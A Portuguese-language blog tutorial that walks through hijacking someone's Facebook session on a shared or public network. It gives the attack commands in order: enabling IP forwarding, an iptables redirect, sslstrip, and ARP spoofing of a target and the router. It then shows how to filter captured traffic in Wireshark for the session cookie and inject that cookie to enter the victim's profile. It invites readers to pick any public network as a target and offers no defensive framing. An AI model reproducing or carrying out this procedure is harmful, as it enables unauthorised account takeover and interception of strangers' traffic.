Hackeando Facebook com Wireshark e Cookie Injector
Primeiramente você vai precisar estar na mesma rede que seu alvo. Se você não tem um alvo específico, qualquer rede pública serve.
Vamos precisar de:
Uma distro Linux para facilitar
Windows qualquer (não sei se foi o chrome ou se foi o mac mas não funcionou no mac)
SSLStrip
Wireshark
Arpspoof
Greasemonkey
Cookie injector para Greasemonkey
Firefox ou Iceweasel
Bastante coisa, não é um tuto muito fácil. Mas depois de um tempo de prática você vê que também não é tão difícil.
Primeiramente baixe tudo o que você não tem. Se você usa Back Track ou Kali, falta apenas o Greasemonkey e o Cookie Injector, com algumas buscas no google você encontra...
Vamos ao tuto então!
Primeiro de tudo temos que ativar o encaminhamento dos pacotes. Para isso basta digitar o comando abaixo:
echo 1 > /proc/sys/net/ipv4/ip_forwarding
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiqoiwUhZ1GEc3FKE9hCsOZVespoZDM-N53HNRxB9EYpiJToGVmVgK6WqSDr4aCqNLAXoHbG28bOdebsLIvKjSp1XxlEGZdQUuEQbti_ZWRUNjgmX9K5XeUccevl9p5JH71e78N7CyMukyn/s400/Captura+de+Tela+2013-05-27+a%CC%80s+23.53.56.png)
O próximo passo é criar uma regra no iptables para redirecionar todo o tráfego:
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEicxQ1HwY2_qUhFOr1ynETGVzrvWUqdTZS6YB-JzDaaJOEDvWU-qZDJPus63XxLIQhJcm0h6lCBB03WRB7iKPFTm84l-itpRw71KBXIE384KLp8GiLOi4-EFrrSxhY45ZFZWWSZc7X8CvES/s400/Captura+de+Tela+2013-05-27+a%CC%80s+23.55.53.png)
Agora sim vamos iniciar o ataque de verdade, inicie o sslstrip para ficar escutando o tráfego:
sslstrp -a -l 8080
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjAFYszMYtkSsPt_kBsTAIKu39K97RTtv4rM7_IZWbN7_NVE_ZyAb4NfAGjhDc5eZSVRUF84c12OAuAyFtXiqkkrVpaJC7SGdYqORoJiAjgSjjKhUFSkpIwUFkbmK9NH_-FHuwwpqlT_C76/s400/Captura+de+Tela+2013-05-27+a%CC%80s+23.57.40.png)
Agora precisamos do arp spoofing, para isso vamos usar duas vezes o comando arpspoof. Mantenha sempre as 2 abas com os 2 comandos rodando em quanto estiver capturando o tráfego:
arpspoof -i eth0 -t ip_do_alvo ip_do_roteador
arpspoof -i eth0 -t ip_do_roteador ip_do_alvo
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiM3jYF8833OnL7q11gF8Pi0RrtTjW9JZPWYIdltbYiyPN-41nlS6gNGCCBI2-fkGJIwT5FF3eAhIlS_6uHeu4OZHOw27OYhkl5L_3lEGxgtPXDt0dsCkC-ufjEADu5kz6LRmYOT9Pk5jfL/s400/Captura+de+Tela+2013-05-28+a%CC%80s+00.00.47.png)
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjQNRxkBgoSa6uTvcB7xoprwnHP-H9QBD1bKKeMjz0jX0qCN5UIDrECG-hHFiJ20dTReygnyLz5PKsH3MCh7FVZj0TOyc03GLRbzoFWmzfdex-pFpBlYLl0kcm9YIwrM-rs6SNhEW8ZsC66/s400/Captura+de+Tela+2013-05-28+a%CC%80s+00.01.07.png)
E por em quanto chega de terminal, vamos para a interface gráfica do wireshark. No wireshark, inicie a captura de pacotes, e para facilitar no filtro de pacotes coloque o seguinte filtro:
http.cookie contains datr
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjLL4HWLrV6OHUhUQh28Q4v26hyphenhyphenom1q9E8O-kJVcJcPJHlSwLy8-sVdokMixvbNDpxwEIn_Ou1AqN3t_Askd9P8uTYGJ135qdLPsPi9-lvaG90lZWdULpk2T-shrZi-N9XasfehMCBtmIzN/s400/Captura+de+Tela+2013-05-28+a%CC%80s+00.03.39.png)
Provavelmente você não receberá nada de início, mas assim que seu alvo acessar um site como por exemplo o Facebook veja o que acontece:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhOyB70Ev1N1DJSO1q6sr4scnXwIwL7DNzFdKooxuX5QREbZqJ7tcmLc8gIt9P8W2AxLoJfF3YPi98QhjeCKCN4eEzDiFtLWE-2lLVm_j3CF38TXrTv7SI3xY2gXJP6n2zSD8cyO-z9Hy7f/s400/Captura+de+Tela+2013-05-28+a%CC%80s+00.10.06.png)
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhOyB70Ev1N1DJSO1q6sr4scnXwIwL7DNzFdKooxuX5QREbZqJ7tcmLc8gIt9P8W2AxLoJfF3YPi98QhjeCKCN4eEzDiFtLWE-2lLVm_j3CF38TXrTv7SI3xY2gXJP6n2zSD8cyO-z9Hy7f/s400/Captura+de+Tela+2013-05-28+a%CC%80s+00.10.06.png)
Provavelmente o último pacote GET é o que contém nosso cookie. Clique com o botão direito nele vá em Copy > Bytes > Printable Text Only:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi7F_qjgFxM3q8H12FkPH7nz-lB65rnArSpO4cAVSZQIORA15suia-olIWA5_mdn_KwgCjjuO2mokvKpIu-lHuKImSvAtUlGs6hkFP6nqEjViI3ERgBEF0TiNsVQp7LqUbniXKo7Zmy5xr8/s400/Captura+de+Tela+2013-05-28+a%CC%80s+00.10.21.png)
Agora só precisamos injetar isso na página do Facebook e termos acesso ao perfil do alvo. Vá então para a página do Facebook e aperte ALT + C para abrir uma janelinha bem no meio da página. Nesta janelinha cole o que copiamos antes:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjjvLTZNjhToSY88HPsRV2OHekwP6qx719Pw3uvTRtnimpXCTADCO8kSSE6N4yBj4Nxc80oyXw6F17bKRmWBJmc4PX9knePVfAANLCM6i71rFKHebIY20iIIHHBX7C7si3nfaqsYZ8RvwwQ/s400/Captura+de+Tela+2013-05-28+a%CC%80s+00.10.53.png)
Se você ver uma mensagem como esta é porque o cookie foi injetado com sucesso, agora é só recarregar o Facebook e ver se funcionou:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjozmQVEcE3bBRKKAKoEo8npk3wOMm1hau9WBkyvc159pyLb2AFnks0NGVq6F9SoyiNfMixEZwlNIOEz1t1vD-U-t3Y-DlCAQznJNC3Otgr-iEoq7hwCVGlqcz_tTIvKSrcJ-x023AB6cEm/s400/Captura+de+Tela+2013-05-28+a%CC%80s+00.11.04.png)
E ai está! Estamos no perfil da vítima!
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj1Jrljiq4PsILx1A5i9B89EZuw4-nhpdAL00h8U9VBXndBNtKTyDpAC5ZYaDv5UzKud3FUgXzHqgTa2Gd7bER-YiPxbheqtph0UOCtZIhEG073PgMwyHwdRUseHAY_PjsT9I14vmBuv02R/s400/Captura+de+Tela+2013-05-28+a%CC%80s+00.11.20.png)
Algumas considerações finais:
Isto funciona não só no Facebook, praticamente todos os sites geram cookies, então praticamente todos os sites (na verdade a culpa não é do site) estão vulneráveis a esse tipo de ataque.
Se a pessoa estiver logando automaticamente porque ela marcou a caixa "Mantenha-me conectado" anteriormente pode ser que isso não funcione.